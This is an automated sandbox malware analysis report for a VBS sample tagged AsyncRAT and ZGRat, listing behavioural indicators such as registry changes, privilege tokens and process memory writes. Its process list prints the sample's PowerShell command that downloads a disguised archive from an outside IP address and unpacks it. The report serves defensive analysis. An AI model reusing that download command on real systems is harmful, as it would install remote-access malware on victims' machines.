Malware Analysis Report

2025-04-13 12:28

Sample ID 240312-rwjvaada89
Target g4.txt
SHA256 e2228f06454d5c8033bb22ad4a81bbc3997e318bf34372a57232b51e8360f4d8
Tags
asyncrat zgrat dox_2024 rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e2228f06454d5c8033bb22ad4a81bbc3997e318bf34372a57232b51e8360f4d8

Threat Level: Known bad

The file g4.txt was found to be: Known bad.

Malicious Activity Summary

asyncrat zgrat dox_2024 rat

AsyncRat

Detect ZGRat V1

ZGRat

Downloads MZ/PE file

Checks computer location settings

Suspicious use of SetThreadContext

Enumerates physical storage devices

Modifies registry class

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

Modifies Internet Explorer settings

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Suspicious use of SendNotifyMessage

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Enumerates system info in registry

Opens file in notepad (likely ransom note)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-12 14:32

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-12 14:32

Reported

2024-03-12 14:46

Platform

win7-20240220-en

Max time kernel

350s

Max time network

705s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\g4.vbs"

Signatures

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{73A541C1-E07D-11EE-9A4D-7A846B3196C4} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MINIE C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\System32\Notepad.exe N/A
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A
N/A N/A C:\Windows\System32\notepad.exe N/A
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2860 wrote to memory of 2920 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2860 wrote to memory of 2920 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2860 wrote to memory of 2920 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1772 wrote to memory of 2452 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1772 wrote to memory of 2452 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1772 wrote to memory of 2452 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1772 wrote to memory of 2452 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 552 wrote to memory of 1764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 552 wrote to memory of 1764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 552 wrote to memory of 1764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 552 wrote to memory of 1672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 552 wrote to memory of 1672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 552 wrote to memory of 1672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 552 wrote to memory of 1672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 552 wrote to memory of 1672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 552 wrote to memory of 1672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 552 wrote to memory of 1672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 552 wrote to memory of 1672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 552 wrote to memory of 1672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 552 wrote to memory of 1672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 552 wrote to memory of 1672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 552 wrote to memory of 1672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 552 wrote to memory of 1672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 552 wrote to memory of 1672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 552 wrote to memory of 1672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 552 wrote to memory of 1672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 552 wrote to memory of 1672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 552 wrote to memory of 1672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 552 wrote to memory of 1672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 552 wrote to memory of 1672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 552 wrote to memory of 1672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 552 wrote to memory of 1672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 552 wrote to memory of 1672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 552 wrote to memory of 1672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 552 wrote to memory of 1672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 552 wrote to memory of 1672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 552 wrote to memory of 1672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 552 wrote to memory of 1672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 552 wrote to memory of 1672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 552 wrote to memory of 1672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 552 wrote to memory of 1672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 552 wrote to memory of 1672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 552 wrote to memory of 1672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 552 wrote to memory of 1672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 552 wrote to memory of 1672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 552 wrote to memory of 1672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 552 wrote to memory of 1672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 552 wrote to memory of 1672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 552 wrote to memory of 1672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 552 wrote to memory of 812 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 552 wrote to memory of 812 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 552 wrote to memory of 812 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 552 wrote to memory of 1540 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 552 wrote to memory of 1540 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 552 wrote to memory of 1540 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 552 wrote to memory of 1540 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 552 wrote to memory of 1540 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 552 wrote to memory of 1540 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 552 wrote to memory of 1540 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 552 wrote to memory of 1540 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 552 wrote to memory of 1540 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 552 wrote to memory of 1540 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 552 wrote to memory of 1540 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 552 wrote to memory of 1540 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\g4.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" http://users/

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1772 CREDAT:275457 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef4dd9758,0x7fef4dd9768,0x7fef4dd9778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1176 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1512 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:8

